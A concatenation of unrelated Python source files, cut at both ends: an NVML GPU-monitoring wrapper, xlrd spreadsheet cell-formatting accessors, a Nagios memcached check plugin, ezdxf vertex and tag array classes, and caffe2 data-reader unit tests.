        """Load ``libnvidia-ml.so.1`` and resolve the required symbols.

        Thread-safe and idempotent: the library is loaded at most once.
        """
        with self._lib_lock:
            if self._nvmlLib is None:
                self._nvmlLib = CDLL("libnvidia-ml.so.1")

                function_pointers = ["nvmlDeviceGetName", "nvmlDeviceGetUUID",
                                     "nvmlDeviceGetMemoryInfo",
                                     "nvmlDeviceGetUtilizationRates",
                                     "nvmlInit_v2", "nvmlShutdown",
                                     "nvmlDeviceGetCount_v2",
                                     "nvmlDeviceGetHandleByIndex_v2"]

                self.func_ptr = {n: self._function_pointer(n)
                                 for n in function_pointers}

    def _function_pointer(self, name):
        # Resolve one symbol from the shared library; translate a missing
        # symbol into the corresponding NVML error.
        try:
            return getattr(self._nvmlLib, name)
        except AttributeError:
            raise NvmlException(NVML_ERROR_FUNCTION_NOT_FOUND)

    def get_function(self, name):
        """Return the resolved function pointer, or None if `name` was not
        among the symbols requested by :meth:`load`."""
        if name in self.func_ptr.keys():
            return self.func_ptr[name]


_NVML = NVML()


class NvidiaDevice(object):
    """Represent a single GPUDevice"""

    def __init__(self, hnd):
        super(NvidiaDevice, self).__init__()
        self.hnd = hnd

    def memory(self):
        """Memory information in bytes

        Example:

            >>> print(ctx.device(0).memory())
            {'total': 4238016512L, 'used': 434831360L, 'free': 3803185152L}

        Returns:
            total/used/free memory in bytes
        """
        class GpuMemoryInfo(Structure):
            # Field order must match nvmlMemory_t exactly.
            _fields_ = [
                ('total', c_ulonglong),
                ('free', c_ulonglong),
                ('used', c_ulonglong),
            ]

        c_memory = GpuMemoryInfo()
        _check_return(_NVML.get_function(
            "nvmlDeviceGetMemoryInfo")(self.hnd, byref(c_memory)))
        return {'total': c_memory.total,
                'free': c_memory.free,
                'used': c_memory.used}

    def utilization(self):
        """Percent of time over the past second was utilized.

        Details:
            Percent of time over the past second during which one or more kernels was
            executing on the GPU.
            Percent of time over the past second during which global (device) memory was
            being read or written

        Example:

            >>> print(ctx.device(0).utilization())
            {'gpu': 4L, 'memory': 6L}
        """
        class GpuUtilizationInfo(Structure):
            # Field order must match nvmlUtilization_t exactly.
            _fields_ = [
                ('gpu', c_uint),
                ('memory', c_uint),
            ]

        c_util = GpuUtilizationInfo()
        _check_return(_NVML.get_function(
            "nvmlDeviceGetUtilizationRates")(self.hnd, byref(c_util)))
        return {'gpu': c_util.gpu, 'memory': c_util.memory}


class NVMLContext(object):
    """Creates a context to query information

    Example:

        with NVMLContext() as ctx:
            num_gpus = ctx.num_devices()
            for device in ctx.devices():
                print(device.memory())
                print(device.utilization())
    """

    def __enter__(self):
        """Create a new context """
        _NVML.load()
        _check_return(_NVML.get_function("nvmlInit_v2")())
        return self

    def __exit__(self, type, value, tb):
        """Destroy current context"""
        _check_return(_NVML.get_function("nvmlShutdown")())

    def num_devices(self):
        """Get number of devices """
        c_count = c_uint()
        _check_return(_NVML.get_function(
            "nvmlDeviceGetCount_v2")(byref(c_count)))
        return c_count.value

    def devices(self):
        """
        Returns:
            [NvidiaDevice]: a list of devices
        """
        return [self.device(i) for i in range(self.num_devices())]

    def device(self, idx):
        """Get a specific GPU device

        Args:
            idx: index of device

        Returns:
            NvidiaDevice: single GPU device
        """
        class GpuDevice(Structure):
            pass

        c_nvmlDevice_t = POINTER(GpuDevice)

        c_index = c_uint(idx)
        device = c_nvmlDevice_t()
        _check_return(_NVML.get_function(
            "nvmlDeviceGetHandleByIndex_v2")(c_index, byref(device)))
        return NvidiaDevice(device)


if __name__ == '__main__':
    with NVMLContext() as ctx:
        print(ctx.devices())
        print(ctx.devices()[0].utilization())

    with NVMLContext() as ctx:
        print(ctx.devices())
        print(ctx.devices()[0].utilization())
# Author:  mozman <mozman@gmx.at>
# Purpose: xfcell -- cell with convenient xf function
# Created: 04.12.2010
# Copyright (C) 2010, Manfred Moitzi
# License: BSD-style licence
"""
The XFCell() object contains the data for one cell.

WARNING: You don't call this class yourself. You access Cell objects
via methods of the Sheet object(s) that you found in the Book object that
was returned when you called xlrd.open_workbook("myfile.xls").

Cell objects have four attributes: `ctype` is an int, `value` (which depends
on `ctype`), `xf_index` and `sheet`, a reference to the containing sheet.
If **formatting_info** is not enabled when the workbook is opened,
xf_index will be **None**.

The following table describes the types of cells and how their values
are represented in Python.

=============== ===== ============ ==========================================
Type symbol     Const Python value Note
=============== ===== ============ ==========================================
XL_CELL_EMPTY   0     ""
XL_CELL_TEXT    1     str
XL_CELL_NUMBER  2     float
XL_CELL_DATE    3     float
XL_CELL_BOOLEAN 4     int          1 means TRUE, 0 means FALSE
XL_CELL_ERROR   5     int          representing internal Excel codes; for a
                                   text representation, refer to the supplied
                                   dictionary error_text_from_code
XL_CELL_BLANK   6     ""           this type will appear only when
                                   open_workbook(..., formatting_info=True)
                                   is used.
=============== ===== ============ ==========================================
"""
import datetime

from .xldate import xldate_as_tuple
from .biffh import XL_CELL_DATE, BaseObject


class XFCell(BaseObject):
    """
    Extended Cell() class with convenient methods for easy access of
    cell properties.
    """
    __slots__ = ['sheet', 'ctype', 'value', 'xf']

    def __init__(self, ctype, value, xf_index=None, sheet=None):
        self.sheet = sheet
        self.ctype = ctype
        self.value = value
        # Resolve the XF record immediately; requires formatting_info=True,
        # otherwise xf_index is None and formatting accessors are unusable.
        if xf_index is not None:
            self.xf = self.book.xf_list[xf_index]
        else:
            self.xf = None

    @property
    def book(self):
        return self.sheet.book

    @property
    def has_xf(self):
        return (self.xf is not None)

    @property
    def xf_index(self):
        if self.has_xf:
            return self.xf.xf_index
        else:
            return None

    @property
    def parent_style(self):
        # The style XF this cell XF inherits unset components from.
        return self.book.xf_list[self.xf.parent_style_index]

    @property
    def is_datetime(self):
        return self.ctype == XL_CELL_DATE

    @property
    def has_date(self):
        # Serial values <= 1.0 encode a pure time-of-day with no date part.
        if self.is_datetime:
            return self.value > 1.
        return False

    def get_color(self, index):
        "Map a colour index to an RGB 3-tuple via the workbook palette."
        return self.book.colour_map[index]

    def datetime(self):
        """
        Returns a datetime.datetime object if cell type is XL_CELL_DATE
        else raises a TypeError, and raises ValueError if the cell has no
        date value (only time value is present).
        """
        if self.is_datetime:
            if self.has_date:
                date = xldate_as_tuple(self.value, self.book.datemode)
                return datetime.datetime(*date)
            else:
                raise ValueError("Cell has no date value.")
        else:
            raise TypeError("Cell is not a XL_CELL_DATE.")

    def date(self):
        """
        Returns a datetime.date object if cell type is XL_CELL_DATE else
        raises a **TypeError**. Raises **ValueError** if the cell doesn't
        have a date value (only time value is present).
        """
        dt = self.datetime()
        return dt.date()

    def time(self):
        """
        Returns a datetime.time object if cell type is XL_CELL_DATE else
        raises a TypeError.
        """
        if self.is_datetime:
            date = xldate_as_tuple(self.value, self.book.datemode)
            return datetime.time(date[3], date[4], date[5])
        else:
            raise TypeError("Cell is not a XL_CELL_DATE.")

    #
    # access the XFBackground() class
    #
    @property
    def background(self):
        # Style XFs carry their own components; cell XFs fall back to the
        # parent style when the corresponding flag is unset.
        if self.xf.is_style and \
           self.xf._background_flag == 0:
            return self.xf.background
        elif self.xf._background_flag:
            return self.xf.background
        else:
            return self.parent_style.background

    def background_color(self):
        """ Get cell background-color as 3-tuple. """
        color_index = self.xf.background.background_colour_index
        return self.get_color(color_index)

    def fill_pattern(self):
        return self.xf.background.fill_pattern

    def pattern_color(self):
        color_index = self.xf.background.pattern_colour_index
        return self.get_color(color_index)

    #
    # access the Font() class
    #
    @property
    def font_index(self):
        if self.xf.is_style and \
           self.xf._font_flag == 0:
            return self.xf.font_index
        elif self.xf._font_flag:
            return self.xf.font_index
        else:
            return self.parent_style.font_index

    @property
    def font(self):
        """ Get the Font() class. """
        return self.book.font_list[self.xf.font_index]

    def font_color(self):
        """ Get cell foreground-color as 3-tuple. """
        return self.get_color(self.font.colour_index)

    #
    # access the Format() class
    #
    @property
    def format_key(self):
        if self.xf.is_style and \
           self.xf._format_flag == 0:
            return self.xf.format_key
        elif self.xf._format_flag:
            return self.xf.format_key
        else:
            return self.parent_style.format_key

    @property
    def format(self):
        """ Get the Format() class. """
        return self.book.format_map[self.format_key]

    def format_str(self):
        """ Get the associated 'format_str'. """
        return self.format.format_str

    #
    # access the XFAligment() class
    #
    @property
    def alignment(self):
        if self.xf.is_style and \
           self.xf._alignment_flag == 0:
            return self.xf.alignment
        elif self.xf._alignment_flag:
            return self.xf.alignment
        else:
            return self.parent_style.alignment

    #
    # access the XFBorder() class
    #
    @property
    def border(self):
        if self.xf.is_style and \
           self.xf._border_flag == 0:
            return self.xf.border
        elif self.xf._border_flag:
            return self.xf.border
        else:
            return self.parent_style.border

    def bordercolors(self):
        """ Get border color as dict of rgb-color-tuples. """
        border = self.border
        return {
            'top': self.get_color(border.top_colour_index),
            'bottom': self.get_color(border.bottom_colour_index),
            'left': self.get_color(border.left_colour_index),
            'right': self.get_color(border.right_colour_index),
            'diag': self.get_color(border.diag_colour_index),
        }

    def borderstyles(self):
        """ Get border styles as dict of ints. """
        border = self.border
        return {
            'top': border.top_line_style,
            'bottom': border.bottom_line_style,
            'left': border.left_line_style,
            'right': border.right_line_style,
            'diag': border.diag_line_style,
        }

    @property
    def has_up_diag(self):
        """ Draw a line across the cell from bottom left to top right. """
        return bool(self.border.diag_up)

    @property
    def has_down_diag(self):
        """ Draw a line across the cell from top left to bottom right. """
        return bool(self.border.diag_down)

    #
    # access the XFProtection() class
    #
    @property
    def protection(self):
        if self.xf.is_style and \
           self.xf._protection_flag == 0:
            return self.xf.protection
        elif self.xf._protection_flag:
            return self.xf.protection
        else:
            return self.parent_style.protection

    @property
    def is_cell_locked(self):
        return bool(self.protection.cell_locked)

    @property
    def is_formula_hidden(self):
        # BUGFIX: previously returned `cell_locked` (copy/paste error), so
        # this property could never report the formula-hidden flag.
        return bool(self.protection.formula_hidden)
#!/usr/bin/env python
# NOTE(review): this plugin is Python 2 code (print statements,
# `except X, e` syntax); it will not run under Python 3 as-is.

import sys
import memcache
import textwrap
import os.path
import time
from nagiosplugin import *

"""
Nagios plugin for checking memcached instances. Returns detailed memcached statistics for use by
perfdata visualisation tools.

Requirements
=============
This script requires the following python modules:
 * argparse (included with python 2.7, otherwise install with 'easy_install argparse')
 * memcache (install with 'easy_install python-memcached' if easy_install is present)

Notes
=====
It's useful to monitor the following statistics:
 * uptime
 * curr_items
 * total_items
 * bytes
 * cmd_get - delta'd by time
 * get_hits - percentage of time delta
 * total_connections - delta'd by time
 * cmd_set - delta'd by time
 * get_misses - delta'd by time
 * evictions - delta'd by time
 * bytes_written - delta'd by time
"""


class MemcachedStats(NagiosPlugin):
    """
    A Nagios plugin to check memcached statistics.

    Statistics are returned in perfdata format. The following can be
    monitored: bytes used, bytes written, cache hits, cache hits (%),
    cache misses, number of current items, evictions, gets, sets,
    total connections, total items, uptime.
    """
    VERSION = '0.1'
    SERVICE = 'Memcached'
    AUTHOR = 'Ally B'

    ## a constant for a special metric we calculate ourselves
    CACHE_HITS_PERCENTAGE = 'cache_hits_percentage'

    class Defaults(object):
        # Fallback settings used by the argument parser.
        timeout = 3
        hostname = 'localhost'
        port = 11211
        delta_file_path = '/var/nagios/check_memcached_plugin_delta'
        delta_precision = 2

    def parse_args(self, opts):
        """ Parse given options and arguments """
        # _default_parser is provided by the NagiosPlugin base class
        # (not visible in this file).
        parser = self._default_parser(description=self.__doc__, version=self.VERSION, author=self.AUTHOR,
            hostname=self.Defaults.hostname, port=self.Defaults.port,
            delta_file_path=self.Defaults.delta_file_path, delta_precision=self.Defaults.delta_precision)
        parser.add_argument('-s', '--statistic', nargs='?', required=True,
            help="""The statistic to check. Use one of the following keywords:
            accepting_conns auth_cmds auth_errors bytes bytes_read bytes_written
            cas_badval cas_hits cas_misses cmd_flush cmd_get cmd_set conn_yields
            connection_structures curr_connections curr_items decr_hits decr_misses
            delete_hits delete_misses evictions get_hits get_misses incr_hits
            incr_misses limit_maxbytes listen_disabled_num pid pointer_size
            rusage_system rusage_user threads time total_connections total_items
            uptime version, or the special value: cache_hits_percentage """)
        args = parser.parse_args(opts)
        # Normalise the optional verbose flag into a plain boolean.
        if 'verbose' not in args:
            args.verbose = False
        else:
            args.verbose = True
        return args

    def _get_statistic(self, statistic):
        "Returns a tuple containing the name of the specified statistic and its value."
        # Lazily create the memcache client on first use.
        if not hasattr(self, 'memcache_statistic'):
            self.memcache_statistic = MemcacheStatistic(self.args.hostname, self.args.port)
        # calculate the cache hits percentage special statistic
        if statistic == self.CACHE_HITS_PERCENTAGE:
            get_hits = self._get_statistic('get_hits')
            cmd_get = self._get_statistic('cmd_get')
            # use separate values for get_hits and cmd_get compared to ordinary invocations to check those
            # statistics
            delta_cache_hits = NumberUtils.string_to_number(self._get_delta('get_hits_hit_cache_perc', get_hits))
            delta_gets = NumberUtils.string_to_number(self._get_delta('cmd_get_hit_cache_perc', cmd_get))
            try:
                cache_hits_percentage = round(delta_cache_hits * 100 / delta_gets, 2)
            except ZeroDivisionError:
                # No gets observed in the interval -> report 0% rather than fail.
                cache_hits_percentage = 0
            if self.args.verbose:
                print "cache hits: %s, gets: %s" % (get_hits, cmd_get)
                print "delta_cache_hits: %s, delta_gets: %s" % (delta_cache_hits, delta_gets)
                print "cache hits %%: %s" % (cache_hits_percentage)
            return cache_hits_percentage
        else:
            return self.memcache_statistic.get_statistic(statistic, self.args.verbose)

    def _get_delta(self, statistic, current_value):
        "Returns the delta for a statistic"
        # _get_value_from_last_invocation / statistic_collection presumably
        # come from the NagiosPlugin base class -- not visible here.
        previous_value = self._get_value_from_last_invocation(statistic)
        delta_value = 0
        # if we're trying to get the delta of the cache_hits_percentage, just divide by delta time since
        # it's already derived from delta values
        try:
            if statistic == self.CACHE_HITS_PERCENTAGE:
                delta = current_value
            else:
                delta = NumberUtils.string_to_number(current_value) - NumberUtils.string_to_number(previous_value['value'])
            delta_time = round(time.time() - previous_value['time'])
            delta_value = round(delta / delta_time, self.args.delta_precision)
        except (KeyError, ZeroDivisionError):
            # First invocation (no previous value) or zero elapsed time:
            # deliberately report a delta of 0.
            pass
        self.statistic_collection[statistic] = current_value
        try:
            self.statistic_collection.persist()
        except IOError, error:
            # NOTE(review): Defaults defines `delta_file_path`, not
            # `delta_file` -- confirm the parser actually stores the path
            # under args.delta_file, otherwise this raises AttributeError.
            raise NagiosPluginError("%s.\nProbably means we were unable to write to file %s" % (str(error), self.args.delta_file))
        return delta_value

    def check(self):
        "Retrieves the required statistic value from memcache, and finds out which status it corresponds to."
        self.statistic = self.args.statistic
        self.statistic_value = self._get_statistic(self.statistic)
        # When delta_time is requested, convert the raw counter into a
        # per-second rate and rename the reported statistic accordingly.
        if hasattr(self.args, 'delta_time'):
            self.statistic_value = self._get_delta(self.statistic, self.statistic_value)
            self.statistic += '_per_second'
        self.status = self._calculate_status(self.statistic_value)


class MemcacheStatistic(object):
    "Returns statistics from a memcache server"

    def __init__(self, server, port):
        self.memcache = memcache.Client(['%s:%d' % (server, port)])

    def get_statistic(self, statistic, verbose=False):
        """
        Returns a statistic value.

        @param statistic The name of the statistic to retrieve
        @param verbose Whether to display verbose output
        """
        server_stats = self.memcache.get_stats()
        # if no stats were returned, raise an Error
        try:
            stats = server_stats[0][1]
        except IndexError:
            if verbose:
                print "Unable to connect to memcache server. Check the host and port and make sure \nmemcached is running."
            raise NagiosPluginError("Unable to connect to memcache server. Check the host and port and make sure \nmemcached is running.")
        if statistic in stats.keys():
            return stats[statistic]
        else:
            raise InvalidStatisticError("No statistic called '%s' was returned by the memcache server." % statistic)


if __name__ == '__main__':
    try:
        checker = MemcachedStats(sys.argv[1:])
        checker.check()
        status = checker.get_status()
        print checker.get_output()
        sys.exit(status)
    except (ThresholdValidatorError, InvalidStatisticError), e:
        print textwrap.fill(str(e), 80)
        sys.exit(NagiosPlugin.STATUS_UNKNOWN)
    except NagiosPluginError, e:
        print textwrap.fill("%s failed unexpectedly. Error was:" % (os.path.basename(__file__,)), 80)
        print textwrap.fill(str(e), 80)
        sys.exit(NagiosPlugin.STATUS_UNKNOWN)
# Copyright (c) 2018-2021 Manfred Moitzi
# License: MIT License
from array import array
from typing import Iterable, MutableSequence, Optional, Sequence, Iterator

from .types import DXFTag
from .const import DXFTypeError, DXFIndexError, DXFValueError
from .tags import Tags
from ezdxf.tools.indexing import Index
from ezdxf.lldxf.tagwriter import TagWriter
from ezdxf.math import Matrix44


class TagList:
    """Store data in a standard Python ``list``."""

    __slots__ = ("values",)

    def __init__(self, data: Optional[Iterable] = None):
        self.values: MutableSequence = list(data or [])

    def clone(self) -> "TagList":
        """Returns a deep copy."""
        return self.__class__(data=self.values)

    @classmethod
    def from_tags(cls, tags: Tags, code: int) -> "TagList":
        """
        Setup list from iterable tags.

        Args:
            tags: tag collection as :class:`~ezdxf.lldxf.tags.Tags`
            code: group code to collect

        """
        return cls(data=(tag.value for tag in tags if tag.code == code))

    def clear(self) -> None:
        """Delete all data values."""
        del self.values[:]


class TagArray(TagList):
    """Store data in an :class:`array.array`. Array type is defined by class
    variable ``DTYPE``.
    """

    __slots__ = ("values",)
    # Defines the data type of array.array()
    DTYPE = "i"

    def __init__(self, data: Optional[Iterable] = None):
        self.values: array = array(self.DTYPE, data or [])

    def set_values(self, values: Iterable) -> None:
        """Replace data by `values`."""
        self.values[:] = array(self.DTYPE, values)


class VertexArray:
    """Store vertices in an ``array.array('d')``. Vertex size is defined by
    class variable ``VERTEX_SIZE``.
    """

    # Defines the vertex size
    VERTEX_SIZE = 3  # set to 2 for 2d points
    __slots__ = ("values",)

    def __init__(self, data: Optional[Iterable] = None):
        # Flat array of doubles: [x0, y0, z0, x1, y1, z1, ...]
        self.values = array("d", data or [])

    def __len__(self) -> int:
        """Count of vertices."""
        return len(self.values) // self.VERTEX_SIZE

    def __getitem__(self, index: int):
        """Get vertex at `index`, extended slicing supported."""
        if isinstance(index, slice):
            return list(self._get_points(self._slicing(index)))
        else:
            return self._get_point(self._index(index))

    def __setitem__(self, index: int, point: Sequence[float]) -> None:
        """Set vertex `point` at `index`, extended slicing not supported."""
        if isinstance(index, slice):
            raise DXFTypeError("slicing not supported")
        else:
            self._set_point(self._index(index), point)

    def __delitem__(self, index: int) -> None:
        """Delete vertex at `index`, extended slicing supported."""
        if isinstance(index, slice):
            self._del_points(self._slicing(index))
        else:
            self._del_point(self._index(index))

    def __str__(self) -> str:
        """String representation."""
        name = self.__class__.__name__
        data = ",\n".join(str(p) for p in self)
        return f"{name} = [\n{data}\n]"

    def __iter__(self) -> Iterator[Sequence[float]]:
        """Returns iterable of vertices."""
        size = self.VERTEX_SIZE
        values = self.values
        index = 0
        len_array = len(values)
        while index < len_array:
            yield tuple(values[index : index + size])
            index += size

    def insert(self, pos: int, point: Sequence[float]):
        """Insert `point` in front of vertex at index `pos`.

        Args:
            pos: insert position
            point: point as tuple

        """
        size = self.VERTEX_SIZE
        if len(point) != size:
            raise DXFValueError(f"point requires exact {size} components.")

        pos = self._index(pos) * size
        _insert = self.values.insert
        # Insert components in reverse order at the same offset to keep the
        # point's component order intact.
        for value in reversed(point):
            _insert(pos, value)

    def clone(self) -> "VertexArray":
        """Returns a deep copy."""
        return self.__class__(data=self.values)

    @classmethod
    def from_tags(cls, tags: Iterable[DXFTag], code: int = 10) -> "VertexArray":
        """Setup point array from iterable tags.

        Args:
            tags: iterable of :class:`~ezdxf.lldxf.types.DXFVertex`
            code: group code to collect

        """
        vertices = array("d")
        for tag in tags:
            if tag.code == code:
                vertices.extend(tag.value)  # type: ignore
        return cls(data=vertices)

    def _index(self, item) -> int:
        # Normalize (and bounds-check) a vertex index; raises DXFIndexError.
        return Index(self).index(item, error=DXFIndexError)

    def _slicing(self, index) -> Iterable[int]:
        # Expand a slice object into an iterable of vertex indices.
        return Index(self).slicing(index)

    def _get_point(self, index: int) -> Sequence[float]:
        # `index` is a vertex index; convert to flat array offset.
        size = self.VERTEX_SIZE
        index = index * size
        return tuple(self.values[index : index + size])

    def _get_points(self, indices) -> Iterable:
        for index in indices:
            yield self._get_point(index)

    def _set_point(self, index: int, point: Sequence[float]):
        size = self.VERTEX_SIZE
        if len(point) != size:
            raise DXFValueError(f"point requires exact {size} components.")
        if isinstance(point, (tuple, list)):
            point = array("d", point)
        index = index * size
        self.values[index : index + size] = point  # type: ignore

    def _del_point(self, index: int) -> None:
        size = self.VERTEX_SIZE
        pos = index * size
        del self.values[pos : pos + size]

    def _del_points(self, indices: Iterable[int]) -> None:
        # Rebuild the array once, skipping all deleted vertices -- O(n)
        # instead of repeated O(n) single deletions.
        del_flags = set(indices)
        size = self.VERTEX_SIZE
        survivors = array(
            "d",
            (
                v
                for i, v in enumerate(self.values)
                if (i // size) not in del_flags
            ),
        )
        self.values = survivors

    def export_dxf(self, tagwriter: "TagWriter", code=10):
        # Write components as group codes (code, code+10, code+20), i.e.
        # x->10, y->20, z->30 for the default code=10.
        # NOTE(review): the 0/10/20 cycle assumes VERTEX_SIZE == 3; for 2d
        # arrays the cycle would drift across vertices -- confirm callers.
        delta = 0
        for c in self.values:
            tagwriter.write_tag2(code + delta, c)
            delta += 10
            if delta > 20:
                delta = 0

    def append(self, point: Sequence[float]) -> None:
        """Append `point`."""
        if len(point) != self.VERTEX_SIZE:
            raise DXFValueError(
                f"point requires exact {self.VERTEX_SIZE} components."
            )
        self.values.extend(point)

    def extend(self, points: Iterable[Sequence[float]]) -> None:
        """Extend array by `points`."""
        for point in points:
            self.append(point)

    def clear(self) -> None:
        """Delete all vertices."""
        del self.values[:]

    def set(self, points: Iterable[Sequence[float]]) -> None:
        """Replace all vertices by `points`."""
        self.clear()
        self.extend(points)

    def transform(self, m: Matrix44) -> None:
        """Transform vertices by transformation matrix `m`."""
        values = array("d")
        for vertex in m.transform_vertices(self):
            values.extend(vertex)
        self.values = values
# Tests for caffe2 dataio readers: runtime-threaded pipes, count/time-limited
# readers and the file-backed CachedReader.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals

from caffe2.python.dataio import Reader, ReaderWithLimit, ReaderWithTimeLimit
from caffe2.python.dataset import Dataset
from caffe2.python.pipeline import pipe
from caffe2.python.schema import Struct, NewRecord, FeedRecord
from caffe2.python.session import LocalSession
from caffe2.python.task import TaskGroup, final_output, WorkspaceType
from caffe2.python.test_util import TestCase
from caffe2.python.cached_reader import CachedReader
from caffe2.python import core, workspace
from caffe2.python.net_builder import ops
import numpy as np
import os
import shutil
import tempfile
import time


def init_dataset(ws, size=100):
    """Build a dataset with a single 'label' field holding 0..size-1."""
    src_init = core.Net('src_init')
    with core.NameScope('src'):
        src_values = Struct(('label', np.array(range(size))))
        src_blobs = NewRecord(src_init, src_values)
        src_ds = Dataset(src_blobs)
        FeedRecord(src_blobs, src_values, ws)
    ws.run(src_init)
    return src_ds


def read_all_data(ws, reader, session):
    """Drain `reader` into a fresh destination dataset, return label blob."""
    dst_init = core.Net('dst_init')
    with core.NameScope('dst'):
        dst_ds = Dataset(reader.schema().clone_schema())
        dst_ds.init_empty(dst_init)
    session.run(dst_init)

    # GLOBAL workspace so the destination blobs survive the TaskGroup.
    with TaskGroup(workspace_type=WorkspaceType.GLOBAL) as tg:
        pipe(reader, dst_ds.writer(), num_runtime_threads=8)
    session.run(tg)

    return ws.blobs[str(dst_ds.content().label())].fetch()


class ReaderWithDelay(Reader):
    """Test reader class that inserts a delay between reading batches."""

    def __init__(self, reader, delay):
        Reader.__init__(self, schema=reader._schema)
        self.reader = reader
        self.delay = delay

    def setup_ex(self, global_init_net, global_finish_net):
        self.reader.setup_ex(global_init_net, global_finish_net)

    def read_ex(self, local_init_net, local_finish_net):
        read_net = core.Net('reader_body')

        def sleep_op(*args, **argd):
            time.sleep(self.delay)

        # The Python sleep op runs before the wrapped read on every batch.
        read_net.Python(sleep_op)([], [])
        return ([read_net], ) + self.reader.read(read_net)


class TestReaderWithLimit(TestCase):
    def test_runtime_threads(self):
        ws = workspace.C.Workspace()
        session = LocalSession(ws)
        src_ds = init_dataset(ws)
        totals = [None] * 3

        def proc(rec):
            # executed once
            with ops.task_init():
                counter1 = ops.CreateCounter([], ['global_counter'])
                counter2 = ops.CreateCounter([], ['global_counter2'])
                counter3 = ops.CreateCounter([], ['global_counter3'])
            # executed once per thread
            with ops.task_instance_init():
                task_counter = ops.CreateCounter([], ['task_counter'])
            # executed on each iteration
            ops.CountUp(counter1)
            ops.CountUp(task_counter)
            # executed once per thread
            with ops.task_instance_exit():
                # Fold the per-thread count into the global counter2, and
                # bump counter3 once per thread.
                with ops.loop(ops.RetrieveCount(task_counter)):
                    ops.CountUp(counter2)
                ops.CountUp(counter3)
            # executed once
            with ops.task_exit():
                totals[0] = final_output(ops.RetrieveCount(counter1))
                totals[1] = final_output(ops.RetrieveCount(counter2))
                totals[2] = final_output(ops.RetrieveCount(counter3))
            return rec

        # Read full data set from original reader
        with TaskGroup() as tg:
            pipe(src_ds.reader(), num_runtime_threads=8, processor=proc)
        session.run(tg)
        self.assertEqual(totals[0].fetch(), 100)
        self.assertEqual(totals[1].fetch(), 100)
        self.assertEqual(totals[2].fetch(), 8)

        # Read with a count-limited reader
        with TaskGroup() as tg:
            q1 = pipe(src_ds.reader(), num_runtime_threads=2)
            q2 = pipe(
                ReaderWithLimit(q1.reader(), num_iter=25),
                num_runtime_threads=3)
            pipe(q2, processor=proc, num_runtime_threads=6)
        session.run(tg)
        self.assertEqual(totals[0].fetch(), 25)
        self.assertEqual(totals[1].fetch(), 25)
        self.assertEqual(totals[2].fetch(), 6)

    def _test_limit_reader_init_shared(self, size):
        # Common fixture: source dataset of `size` records plus an empty
        # destination dataset with the same schema.
        ws = workspace.C.Workspace()
        session = LocalSession(ws)

        # Build test dataset
        src_ds = init_dataset(ws, size=size)

        # Create an identically sized empty destination dataset
        dst_init = core.Net('dst_init')
        with core.NameScope('dst'):
            dst_ds = Dataset(src_ds.content().clone_schema())
            dst_ds.init_empty(dst_init)
        ws.run(dst_init)

        return ws, session, src_ds, dst_init, dst_ds

    def _test_limit_reader_shared(self, reader_class, size, expected_read_len,
                                  expected_finish, num_threads, read_delay,
                                  **limiter_args):
        # Shared driver for the count- and time-limited reader tests.
        ws, session, src_ds, dst_init, dst_ds = \
            self._test_limit_reader_init_shared(size)

        # Read without limiter
        # WorkspaceType.GLOBAL is required because we are fetching
        # reader.data_finished() after the TaskGroup finishes.
        with TaskGroup(workspace_type=WorkspaceType.GLOBAL) as tg:
            if read_delay > 0:
                reader = reader_class(
                    ReaderWithDelay(src_ds.reader(), read_delay),
                    **limiter_args)
            else:
                reader = reader_class(src_ds.reader(), **limiter_args)
            pipe(reader, dst_ds.writer(), num_runtime_threads=num_threads)
        session.run(tg)
        read_len = len(sorted(ws.blobs[str(dst_ds.content().label())].fetch()))
        self.assertEqual(read_len, expected_read_len)
        self.assertEqual(
            sorted(ws.blobs[str(dst_ds.content().label())].fetch()),
            list(range(expected_read_len))
        )
        self.assertEqual(ws.blobs[str(reader.data_finished())].fetch(),
                         expected_finish)

    def test_count_limit_reader_without_limit(self):
        # No iter count specified, should read all records.
        self._test_limit_reader_shared(ReaderWithLimit,
                                       size=100,
                                       expected_read_len=100,
                                       expected_finish=True,
                                       num_threads=8,
                                       read_delay=0,
                                       num_iter=None)

    def test_count_limit_reader_with_zero_limit(self):
        # Zero iter count specified, should read 0 records.
        self._test_limit_reader_shared(ReaderWithLimit,
                                       size=100,
                                       expected_read_len=0,
                                       expected_finish=False,
                                       num_threads=8,
                                       read_delay=0,
                                       num_iter=0)

    def test_count_limit_reader_with_low_limit(self):
        # Read with limit smaller than size of dataset
        self._test_limit_reader_shared(ReaderWithLimit,
                                       size=100,
                                       expected_read_len=10,
                                       expected_finish=False,
                                       num_threads=8,
                                       read_delay=0,
                                       num_iter=10)

    def test_count_limit_reader_with_high_limit(self):
        # Read with limit larger than size of dataset
        self._test_limit_reader_shared(ReaderWithLimit,
                                       size=100,
                                       expected_read_len=100,
                                       expected_finish=True,
                                       num_threads=8,
                                       read_delay=0,
                                       num_iter=110)

    def test_time_limit_reader_without_limit(self):
        # No duration specified, should read all records.
        self._test_limit_reader_shared(ReaderWithTimeLimit,
                                       size=100,
                                       expected_read_len=100,
                                       expected_finish=True,
                                       num_threads=8,
                                       read_delay=0.1,
                                       duration=0)

    def test_time_limit_reader_with_short_limit(self):
        # Read with insufficient time limit
        size = 50
        num_threads = 4
        sleep_duration = 0.25
        duration = 1
        expected_read_len = int(round(num_threads * duration / sleep_duration))

        # Because the time limit check happens before the delay + read op,
        # subtract a little bit of time to ensure we don't get in an extra read
        duration = duration - 0.25 * sleep_duration
        self._test_limit_reader_shared(ReaderWithTimeLimit,
                                       size=size,
                                       expected_read_len=expected_read_len,
                                       expected_finish=False,
                                       num_threads=num_threads,
                                       read_delay=sleep_duration,
                                       duration=duration)

    def test_time_limit_reader_with_long_limit(self):
        # Read with ample time limit
        self._test_limit_reader_shared(ReaderWithTimeLimit,
                                       size=50,
                                       expected_read_len=50,
                                       expected_finish=True,
                                       num_threads=4,
                                       read_delay=0.25,
                                       duration=6)

    def test_cached_reader(self):
        ws = workspace.C.Workspace()
        session = LocalSession(ws)

        def build_source_reader(size):
            src_ds = init_dataset(ws, size)
            return src_ds.reader()

        # Reserve a unique path, then remove the file so build_cache creates it.
        with tempfile.NamedTemporaryFile(delete=False) as f:
            path = f.name
            f.close()
            os.remove(path)

        # Read data for the first time.
        cached_reader1 = CachedReader(build_source_reader(100))
        init_step = cached_reader1.build_cache(path)
        session.run(init_step)

        data = read_all_data(ws, cached_reader1, session)
        self.assertEqual(sorted(data), list(range(100)))

        # Read data from cache.
        workspace.ResetWorkspace()
        cached_reader2 = CachedReader(build_source_reader(200))
        init_step = cached_reader2.build_cache(path)
        session.run(init_step)

        # Still 100 records: the cache (built from the 100-record source)
        # shadows the new 200-record source.
